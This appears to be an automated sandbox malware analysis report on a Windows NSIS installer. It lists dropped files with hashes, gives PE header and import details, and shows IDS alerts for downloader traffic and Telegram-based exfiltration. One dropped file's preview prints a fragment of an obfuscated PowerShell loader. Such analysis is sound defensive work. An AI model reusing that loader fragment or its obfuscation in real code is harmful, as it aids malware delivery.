Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(...(...(...@......(.@....}i.Z.)GQ.....p.>..6b.6...2...........B.D.......T..>....h.oH.......,..~m.'...Qq....d....z.{.1.. ...1...%..kme;lCiq&s.#f......)..j.NV....~...+(\Mo24..nC)d88#.}.$U..J.I....S...Up:.R..&. `]J...(.M@...p1N........s..f.T.....w7.).&......W..(...;..KIK@.h=iM%.-.Q@.Hz...)(.?.:...r..(...............?J.^..aJ9.}.4s3{.rs3.A......S.71.@M0s;{qO...>....

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\unelected.jpg

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 475x186, components 3
Category:	dropped
Size (bytes):	18271
Entropy (8bit):	7.963546577406307
Encrypted:	false
SSDEEP:	384:oF01RYd27t1+NXrhNQ4PH2FRIP15YsN51rSYUTdRPsogTA9tRuhC:oy12oUrhfO45n51m7EU3ow
MD5:	C78C937BCB7EDA46D960B55DD205A656
SHA1:	002E2D917391A79F81FA4224329369BB38C78D69
SHA-256:	E620BE67A1E5D1498B114E08E85570D38E15CF89B0C991D9141779EFA170944F
SHA-512:	4EF9C1AE6FFF2DE8729B00952423966E243CFE14305809A856B2577C0B2A91C382B23229521CD41983C4D04891BFCA3882E310CB8B4116FC48C2B9837718212E
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....H.C......$.M$.".p.~...}k5..m..#. ..S$.H..q...3...#?..^.&..m..~G.....7..?.qdf.$vf.O8\|...............>..........0.:..s....##.......:xH.S.GI/....U...k...+<e...{......o./.TX.b2.G.5....G.1Rb.U.r<Q...b...Q.~.1H.3m<..Q......EL.eX......M.......?OJ...e.B.z.....(.e^iY3Tj/.).N.iu...XV(....Mg..'I=.,D......;...Ut.7`.@...Nh....I%.:.n..,O.\|..T..]..?Z.,.$S....-

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3239), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	55113
Entropy (8bit):	5.315301978482481
Encrypted:	false
SSDEEP:	1536:XPumcmPhl3k9fF1x6iJc9HpCbxEQegeRzUj5NUH2vCvTrKv:XPumv5l2fFeaqcgKgH2Ki
MD5:	3F447FB7B0E3C8CF230E8795FE2C8566
SHA1:	0328B69EB185D10841DD3796075AAEFF5A2E7143
SHA-256:	997645F942E24B8BABB448EBB4FDCA2B2A26AB93BAACBD0303D5A6BBC40905FA
SHA-512:	64B03FEBA89B0C4F42DB1795441DD0084A68A2EDFB343A5E3878C57463708B08889A6887C7BCB52D26795FBF832A6EE810E0788465608591FDC7182BC1E7B656
Malicious:	true
Preview:	$Mahogniens202=$Delforlig83;........$gambia = @'.Bengn.Kenne$CulveK KommePede rBoatyaSpilotGgedeoEnevrtJitiooTryw mFestdiRaiafeTranssBullu2 Chia0 Mora4Dejen=Sandh$Chri S fpoiFak,rg .lasjIn.ben FondeFolkerSkil ebesty;Nedkl.Omby fAfgifu.etronSa dmcFlaget FormiTingioSim ln nder .arigM DissaVarigrLarrujMis,ioDoknirSmrreaFderam Hemo Samme(Mater$ S moV EkstaForekgForswtExcreeMeli lCocorkBowyeoDonken FumbgUdsaveTryk , Lyra$Strk.UGl etd In estthedp EfteiL,kvilPostgsDrangsDiphyi roggLoxo,nOverraSiphulSculpsBath )Kiwie Senti{ Chee.s,cia. aca$JagttA,esorfGiltsshikeptCi.arropfi aLa dsfLoku,fMewa eLiverlAescus UnofeSpecinBetje Ungy(MyndiS otenlLatiriGrauppAnta stebbao CumllRefale,kabi5 Hack5Cagin Caddl' At muDummifreprorPrivaeSadeld dopt$StirrSSjattcProdurFemogeOppeb InappVUnerePForaaaMolbonGaa et BiogrEnc maFitfuI.akkenHomicdOver i itupv UnsdgAnaglEDog anpa ticintrae padipRegnstEpith To oiMMidteb re,apTro rs malae.ubip InteZHjemlo Endp Ho etPrudelOrb cSBelnnoDor edgrudga HeadvGrillkTaksiCS.

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Pictury192.jpg

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 391x666, components 3
Category:	dropped
Size (bytes):	43913
Entropy (8bit):	7.977452443275846
Encrypted:	false
SSDEEP:	768:SE8s3SUr4J+/IdtMVaEWAN/l+g9Nsu25QdEVD7fEbi1aEthGweTZ0eLd5aqE:SE8siUedtMFDFYg9NsuMQidd80PeTWoQ
MD5:	C47C306D7ABA07DD0BB4895BE87BD011
SHA1:	86E482D215DF1D63AA265AC68718C1346D3291AD
SHA-256:	7F61CF4B4DA67E35C00E8280950227180528E216241859F441B1BAB58871290C
SHA-512:	B7169F4C1E44A51D57B7D3915D2394F4EDE30596FCE0FE0BAC37B9BCE09E05481E914612159506304CC39F80B2F3A97D80E34D5A4191B9F471D5EB5AD067F2E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....nt.[..Y..d.I.r..B?.t..ju.......E..e<$.J..d a&..q.-.T...]CF......Dl..0.w#D#...O.r..P..E.F8=.Q......n.)Z.ef...V.. .ap.n.;g...7.V..".J...(..S.+.:4^...B8+E....X5..q.x.B/...u....T.n.T.l&.~i.[...08?B.W.M......\|.O.^oa'......+...q..U..1].z..Z...&.]..P.._w.@...p.;V.....O..;........4.:p......I".......~..X]..Z.p.8$..q..S......G........{.m......f..............(R.5....

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Plottermodel.str

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	156678
Entropy (8bit):	1.2392361902443803
Encrypted:	false
SSDEEP:	3072:TTJlL23+fwE1HOHcsT4a4ikQraXiiRMMPF7Lrq6OO3KJ4TgL+L26aewe:TTJlL2ewE1HOHcs8a4ikQraXiiRMMPFr
MD5:	9690DEBA0712D151BD9BCDA56ADD7792
SHA1:	1AE73286894633B698C70AF4602EE22D5A5F7799
SHA-256:	A9B04FF6FED56FDEA521F2045B4A28C7C2D330842E3E6AF89041FA44331B8CF9
SHA-512:	B2EB1AC4FA91BC366E8CADB60E2F2B67D7E0FF223A963284724CE39921E58FFFE543C146ED58B3C695BA4DED61FF23807AC76114DF640CE8ED772E494C52D151
Malicious:	false
Preview:	......................................a.......................Z..........-.....w...]........................................................J................d..........................................Y..............n....c..............:..............................................................c...<.............O.........v. .......s.............................................................................~.............._................9......t....o.............6............................................B..J......................_..............tuR....~......................................................i...........&.~...............................................{.........T.........................6..........N...................................................@........................<.....................................\|....!.........................................5.........................5.......................7...................................

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Printnings.ini

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	489
Entropy (8bit):	4.347778038734469
Encrypted:	false
SSDEEP:	12:ZM/SFH3eQwsTGcvalTyiPZ2NaD6L+kzITVEJHcaeNO5Ac7v:a4vwMGcva1yE2ClkzIhKt5z
MD5:	F6CC208DF83EE2375F6B40FC7FD04371
SHA1:	239AC4B880B5DA9FEFCF97E1E4A64E1EABF45803
SHA-256:	DBDEAEAE516C06171BFB172032DA6DE191952D9FB83D8B442C7383FD70BF12CD
SHA-512:	546097B41A80D9A83775F7A3C7C7D194C3BAE8C0489D66B82729FB0A4623E328794159AF12246E1C89FF37D14ADB6E18279250A5B86D59DA15AF5C7315DCF20D
Malicious:	false
Preview:	..oilers unsimilarly bekvemmestes pavedmme,antitheistic urolige edikternes resilver poorlyish idealiser..;molesteringens devouring touters overgenerous.Sublimaternes parasitr ubalancerede erindrings welching desmohemoblast..opiumsforgiftning unilateralen troldmandsorganisations tjurers tyresds uanmeldtes.Silicohydrocarbon applausers dupped lvov tvangsruternes..Feelings brnehaveklasser brumstone jollende wilhelmina ideforladte,skaldyrsaflejrings sonambulisterne gobelins acrospiring....

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\bulteriernes.aut

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	data
Category:	dropped
Size (bytes):	284439
Entropy (8bit):	1.2475578171192188
Encrypted:	false
SSDEEP:	3072:92qLx/ylKbyTCAwkdueZicxy6nLIaUcfZa21XNX1EktfECPmoImDnGwaHKQb1ldK:XJjBnw
MD5:	673DA1CD5CA01F5B214929F9D9349435
SHA1:	0C303E0480BB8401C7D0530A501B249099E29107
SHA-256:	5B20E3E4A355B53EE2EDDD3504B4FAE1FF34D3808DAC18C2D5B7CD5E0121BE26
SHA-512:	E68DC3423F3DC62215BE936BEE752F20F9EC627C8543B0533B2DF143C730C5078E8676790CC50B55C07AF117B859827B4C70E4C6A7C5210F976293DB68E4D591
Malicious:	false
Preview:	___.c________._U____________S_.________.______.__.__________________._._________.__________._____________________________.__________________________________________?__4___________________________.__._______________._____.._______________________________..__.________.__.________._________________v_______.___.______________._________._______._____.________>___________________________.________.______.__________._____)\_________._______________________._v____.___________g_.__________________.__.____________.____(_.______________._________.u__________.___A_______________________x____________`___________________.__._____..______._._______v_______U______.___________________%____,__________________.____~_________x___E______.__________.______j________._________________________________.._______._______________w___________________________.__________________________________________.__H__.______________________________q______u__.______________.____.__+__.___________________________.______.________.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.730810773728958
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	000027_A-000032.exe
File size:	794'310 bytes
MD5:	e9fe3937a3a7c10e6a7554f24deea7b0
SHA1:	2a4159954b099847b09ecf3c9a5d874135cc00c0
SHA256:	550578efc3220ae7a5c318a0c6f54bfe1bcb48d07a9721851fb383f61bb14996
SHA512:	b0dca24ecfea4b160324bfceb8b8a1303462ed81c15e18a9779d8426ac6737a16e6f1251b24f0c4638f37df005de246250a61bea9fdc5d402f98e408d5c56322
SSDEEP:	24576:Taog+LbN+6bOwZNBtbpvaHeB0dtAjXuiyW2Y4:TZgExfvKe2Yui72Y4
TLSH:	33F422552AB1B94BE3081E309577DF98E7BEBF81A0315803471B3EA479F42A74E9508F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....{.W.................^.........

File Icon


Icon Hash:	0109017171a76f47

Static PE Info

General

Entrypoint:	0x40322b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57807BD1 [Sat Jul 9 04:21:37 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4f67aeda01a0484282e8c59006b0b352

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FD0152D3543h
push ebx
call 00007FD0152D64C9h
cmp eax, ebx
je 00007FD0152D3539h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FD0152D6445h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FD0152D351Dh
push ebp
push 00000009h
call 00007FD0152D649Ch
push 00000007h
call 00007FD0152D6495h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007FD0152D60BFh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007FD0152D60ADh
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33000	0x1d728	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dc5	0x5e00	566b191b40fde4369ae73a05b57df1d2	False	0.6685089760638298	data	6.47110609300208	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	6389f916226544852e494114faf192ad	False	0.4271484375	data	5.0003960999706765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	72dcd89e8824ae186467be61797ed81e	False	0.6474609375	data	5.220595003364983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0xf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33000	0x1d728	0x1d800	55ba200e09054658dd297cc7840debe5	False	0.4387165651483051	data	4.970607641884706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x333a0	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x33708	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.20608068141488228
RT_ICON	0x43f30	0x77f4	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9851178845903348
RT_ICON	0x4b728	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3408713692946058
RT_ICON	0x4dcd0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3904784240150094
RT_ICON	0x4ed78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.4418032786885246
RT_ICON	0x4f700	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4946808510638298
RT_DIALOG	0x4fb68	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x4fcb0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x4fdf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4fef0	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x50010	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x500d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x50138	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x50198	0x250	data	English	United States	0.527027027027027
RT_MANIFEST	0x503e8	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description	Data
Comments	bldgrings knockers indboforsikringens
InternalName	somervillite.exe
LegalCopyright	kuldslog titreres
ProductName	lynn siris granomerite
ProductVersion	3.0.0.0
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-19T11:43:18.617519+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49799	142.250.186.46	443	TCP
2025-02-19T11:43:23.863507+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49832	193.122.130.0	80	TCP
2025-02-19T11:43:25.285379+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49832	193.122.130.0	80	TCP
2025-02-19T11:43:25.843288+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49853	104.21.16.1	443	TCP
2025-02-19T11:43:26.363707+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49855	193.122.130.0	80	TCP
2025-02-19T11:43:28.014386+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49868	104.21.16.1	443	TCP
2025-02-19T11:43:43.550939+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49977	104.21.16.1	443	TCP
2025-02-19T11:43:44.468952+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49983	149.154.167.220	443	TCP
2025-02-19T11:43:57.613562+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50027	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2025 11:43:17.519262075 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:17.519355059 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:17.519695044 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:17.572504044 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:17.572544098 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.236203909 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.236284018 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.237087965 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.237145901 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.292184114 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.292216063 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.292460918 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.292916059 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.295964003 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.339339972 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.617042065 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.617225885 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.617233038 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.617464066 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.621723890 CET	49799	443	192.168.2.4	142.250.186.46
Feb 19, 2025 11:43:18.621747971 CET	443	49799	142.250.186.46	192.168.2.4
Feb 19, 2025 11:43:18.656491995 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:18.656594038 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:18.656780958 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:18.656992912 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:18.657012939 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:19.294440031 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:19.294506073 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:19.298022032 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:19.298046112 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:19.298331976 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:19.298378944 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:19.298698902 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:19.339337111 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.786137104 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.786231041 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.786349058 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.786402941 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.800759077 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.800842047 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.800879002 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.800928116 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.872447014 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.872483015 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.872723103 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.872792959 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.872874022 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.874762058 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.874816895 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.874825001 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.874871969 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.881051064 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.881688118 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.881695986 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.881747961 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.890533924 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.893343925 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.893352032 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.893523932 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.899460077 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.899897099 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.899951935 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.899997950 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.900041103 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.900075912 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.902348042 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.905529976 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.907001972 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.907016039 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.907077074 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.911251068 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.911324978 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.911338091 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.911402941 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.917196989 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.917356968 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.917370081 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.917439938 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.922785044 CET	443	49810	172.217.16.193	192.168.2.4
Feb 19, 2025 11:43:21.922854900 CET	49810	443	192.168.2.4	172.217.16.193
Feb 19, 2025 11:43:21.922867060 CET	443	49810	172.217.16.193	192.168.2.4
